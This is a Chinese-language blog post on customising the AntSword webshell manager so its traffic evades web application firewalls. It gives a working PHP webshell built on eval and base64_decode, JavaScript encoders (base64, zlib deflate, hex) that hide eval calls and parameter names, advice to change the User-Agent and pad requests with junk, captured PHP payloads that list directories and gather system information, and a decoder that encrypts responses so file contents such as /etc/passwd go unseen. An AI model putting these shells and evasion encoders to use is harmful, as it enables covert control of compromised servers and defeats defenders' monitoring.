蚁剑改造

蚁剑改造

前言

蚁剑和菜刀一样是一款优秀的webshell管理工具(shll控制端),与菜刀相比,蚁剑具有开源,自定义能力强,跨平台等优点。但是蚁剑也有许多比较明显的特征,容易暴露从而被waf拦截。所以,需要进行一些改造。

UA头修改

蚁剑的UA头

image-20210417153924459

可以看到蚁剑的UA头直接就是antSword,这很容易就被waf识别并进行拦截,所以我们需要进行修改,到.modules/request.js里面

  • 修改下面两个文件

    1
    2
    3
    4
    5
    antSword/modules/request.js  //新版本似乎不用修改这个文件了
    21行 user-agent

    antSword/modules/update.js
    153 165行的user-agent

  • 也可以直接在连接shell的时候修改header头。

    image-20210420085440325

    当然也不止UA头,还有一些PHPSESSID,之前我们利用的Referer,accept–Language等等。总之就是让他像一个正常的浏览器发出的请求,那里不对改哪里。

流量中的特征–编码器修改

现在的蚁剑中引入了base64,chr,chr16,rot13。这些编码器,防止直接传输信息,被查杀,但是我们可以抓包看看这些编码器的包。

base64

image-20210418151735922

rot13

image-20210418151943558

可以看到最后都有一个eval(),这个特征码就很容易被捕捉到。

修改🐎之全base加密

比较简单的做法是,直接修改🐎,让🐎直接就接受base64加密的数据就可以了,即把🐎变成下面这样。

1
2
3
<?php
@eval(base64_decode($_POST['tunan']));
?>

接收到的数据是 base64 格式的,先解码,然后再传给 eval。

打开编码管理写编码器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/**
 * php::base64编码器
 * Create at: 2021/04/18 15:36:16
 */

'use strict';

module.exports = (pwd, data, ext={}) => {
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  data[randomID] = Buffer.from(data['_']).toString('base64');
  data[pwd] = Buffer.from(`eval(base64_decode($_POST[${randomID}]));`).toString('base64');
  delete data['_'];
  return data;
}

这个其实可以直接把他最后的包提取出来,然后base64加密下就行。base64可以,那么chr等都可以这样进行修改,只要在🐎里面有相应的解密函数就行。

修改完成之后再发包就是这样了,eval等也被base64加密了,不容易被识别。

image-20210418155311941

修改🐎之zlib_deflated_raw加密

其实蚁剑官方也有相应的加密方式 https://github.com/AntSwordProject/AwesomeEncoder

其中这个zlib_deflated_raw加密,该方式通过将数据进行zlib压缩后进行base64编码传输给shell,这样要求shell将传输的数据先进行base64解密后通过gzinflate将压缩数据进行解压缩,从而实现流量混淆:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/**
 * php::zlib_deflated_raw 编码器
 * Create at: 2019/01/12 00:05:44
 * zlib 压缩 payload, 适配 shell 见代码处
 */

'use strict';

var zlib = require('zlib');
/*
* @param  {String} pwd   连接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
  // ##########    请在下方编写你自己的代码   ###################
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  data[randomID] = zlib.deflateRawSync(data['_']).toString('base64');
  
  // <?php @eval($_POST['ant']);?>
  //data[pwd] = `eval(@gzinflate(base64_decode($_POST[${randomID}])));`;
  
  // <?php @eval(@gzinflate(base64_decode($_POST['ant']))); ?>
  data[pwd] = zlib.deflateRawSync(`@eval(@gzinflate(base64_decode($_POST[${randomID}])));`).toString('base64');
  
  // <?php @eval(@gzinflate(base64_decode($_POST['ant']))); ?>
  // data[pwd] = zlib.deflateRawSync(`@eval(@gzinflate(base64_decode($_POST[${randomID}])));`).toString('base64');
  
  // ##########    请在上方编写你自己的代码   ###################

  delete data['_'];
  return data;
}

把之前的免杀shell进行修改即可,即将传输数据进行gzinflate(base64_decode($_POST['']));

传送的数据就像下面这样,

image-20210419093909468

像这样我们可以把数据进行多次嵌套加密,拼接等等,只要修改下我们的🐎就行。

流量中的0x修改

可以看一下我们之前截取的发包图片,基本都是两个参数,第一个0x**************,第二个是密码,那么如果waf一看,盲猜你是蚁剑的流量,直接给你拦截了。又要怎么破解呢?

我们可以看一下这些数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
'use strict';

/*
* @param  {String} pwd   连接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
  console.log('data:',data);
  console.log('pwd:',pwd);
  data[pwd] = Buffer.from(data['_']).toString();
  delete data['_'];
  return data;
}

需要打开开发者工具

获取到的数据

image-20210420095428057

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
//data:

@ini_set("display_errors", "0");
@set_time_limit(0);

function asenc($out) {
	return str_rot13($out);
};
function asoutput() {
	$output=ob_get_contents();
	ob_end_clean();
	echo "a09c"."812d6";
	echo @asenc($output);
	echo "661e"."cd0a";
}
	ob_start();
try{$D=base64_decode(substr($_POST["bb642229c15a1"],2));
	$F=@opendir($D);
	if($F==NULL) {
		echo("ERROR:// Path Not Found Or No Permission!");
	} else {
		$M=NULL;
		$L=NULL;
		while($N=@readdir($F)) {
			$P=$D.$N;
			$T=@date("Y-m-d H:i:s",@filemtime($P));
			@$E=substr(base_convert(@fileperms($P),10,8),-4);
			$R="	".$T."	".@filesize($P)."	".$E.;
			if(@is_dir($P)) 
				$M.=$N."/".$R;
			else 
				$L.=$N.$R;}
			echo 
			$M.$L;
			@closedir($F);
		};
	}catch (Exception $e) 
	{
		echo "ERROR://".$e->getMessage();
};

asoutput();
die();"

bb64.......:"tFRjovU3lzdGVtIFZvbHVtZSBJbmZvcm1hdGlvbi8="


tunan: 

@ini_set("display_errors", "0");
@set_time_limit(0);

function asenc($out) { 
	return str_rot13($out); 
};
function asoutput() { 
	$output=ob_get_contents();
	ob_end_clean();
	echo "a09c"."812d6";
	echo @asenc($output);
	echo "661e"."cd0a"; 
}
ob_start();
try {
	$D=base64_decode(substr($_POST["bb642229c15a1"],2));
	$F=@opendir($D);
	if ($F==NULL) {
		echo("ERROR:// Path Not Found Or No Permission!");
	} else 
	{$M=NULL;$L=NULL; 
		while ($N=@readdir($F)) {
			$P=$D.$N;
			$T=@date("Y-m-d H:i:s",@filemtime($P));
			@$E=substr(base_convert(@fileperms($P),10,8),-4);
			$R="	".$T."	".@filesize($P)."	".$E."	";
			if (@is_dir($P))
				$M.=$N."/".$R; 
			else 
				$L.=$N.$R;
		}
			echo $M.$L;
			@closedir($F);
		};
	}
			
	catch(Exception $e) {
		echo "ERROR://".$e->getMessage();
	};
	
asoutput();
die();

可以遍历data,把key也加密一下,然后再最后需要把马也对应改下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/**

php::hex for 编码器
Create at: 2019/04/10 13:02:54

<?php
foreach($_POST as $k => $v){$_POST[$k]=pack("H*", $v);}
@eval($_POST['ant']);
?>

*/
'use strict';

module.exports = (pwd, data) => {
  let ret = {};
  for (let _ in data) {
    if (_ === '_') { continue };
    ret[_] = Buffer.from(data[_]).toString('hex');
  }
  ret[pwd] = Buffer.from(data['_']).toString('hex');
  return ret;
}

后来我发现,这种做法实在太麻烦了,看一下编码器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/**
 * php::base64编码器
 * Create at: 2021/04/20 11:20:56
 */

'use strict';

/*
* @param  {String} pwd   连接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
  // ##########    请在下方编写你自己的代码   ###################
  // 以下代码为 PHP Base64 样例

  // 生成一个随机变量名
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // 原有的 payload 在 data['_']中
  // 取出来之后,转为 base64 编码并放入 randomID key 下
  data[randomID] = Buffer.from(data['_']).toString('base64');

  // shell 在接收到 payload 后,先处理 pwd 参数下的内容,
  data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;

  // ##########    请在上方编写你自己的代码   ###################

  // 删除 _ 原有的payload
  delete data['_'];
  // 返回编码器处理后的 payload 数组
  return data;
}

纠结的点就是0x问题,既然这样,看下代码,直接改成这样子岂不就行了。

1
2
3
let randomID = `_0x${Math.random().toString(16).substr(2)}`;

let randomID ='token';

其实也不一定是token,可以看看数据中的参数,适当进行一定的修改。然后body里面再加一堆废数据混淆。

解码器

上面的这些操作,其实已经差不多了,但是我拦不住你的进入流量,但是我可以不给你响应相应的包,比如获取etc/passwd文件内容,

或者etc/shadow这个文件,这些文件在正常的业务都不可能会出现的,所以如果一但检测到相应的文件特征就拦截,有敏感信息就审查在放包。所以返回包也需要进行加密,不能明文发送。

base64解码

先看看蚁剑发送的php代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) {
    return $out;
};
function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "28e" . "2484";
    echo @asenc($output);
    echo "4b3670" . "9e8fe7";
}
ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH _TRANSLATED"]);
    $R = "{$D} ";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R . = "{$L}:";
    } else {
        $R.= "/";
    }
    $R.= " ";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R.= php_uname();
    $R.= " {$s}";
    echo $R;;
}
catch(Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die()
?>

下面是base64解码器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/**
 * php::base64解码器
 * Create at: 2021/04/21 10:40:20
 */

'use strict';

module.exports = {
  /**
   * @returns {string} asenc 将返回数据base64编码
   * 自定义输出函数名称必须为 asenc
   * 该函数使用的语法需要和shell保持一致
   */
  asoutput: () => {
    return `function asenc($out){
      return @base64_encode($out);
    }
    `.replace(/\n\s+/g, '');
  },
  /**
   * 解码 Buffer
   * @param {string} data 要被解码的 Buffer
   * @returns {string} 解码后的 Buffer
   */
  decode_buff: (data, ext={}) => {
    return Buffer.from(data.toString(), 'base64');
  }
}

可以在burp中抓包看看返回的数据

image-20210421105844531

发现无法直接解码,可以看看我们之前发送的原始包,asenc函数就是指定的输出内容,默认情况下直接输出明文,若我们设置了解码器,那么我们在编码器内编写的混淆函数变会替换asenc的内容,然后服务器响应的数据通过asenc函数混淆后输出。在往后看,有一个asoutput函数,这个函数,它会在数据base之后的前后加入一些混淆数据。例如这个就在这个的最前面加入了28e2484,最后加入了4b36709e8fe7,相当于加盐操作了。不过rot13的话,因为本质是凯撒密码的变形,所以加盐也没什么用,不如用base。

参考 :https://mp.weixin.qq.com/s?__biz=MzI0MDI5MTQ3OQ==&mid=2247483895&idx=1&sn=1609e6c4df7ce585e2ed9a3e38f29051&chksm=e91c5a0fde6bd319168b9e3d564b6fbbb26be208c1c8a26a9995baf0fc4d8e34df2c703fed81&mpshare=1&scene=23&srcid&sharer_sharetime=1572778179592&sharer_shareid=3bdf1b0c76d4c1691e700c57f87d9c0a%23rd

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true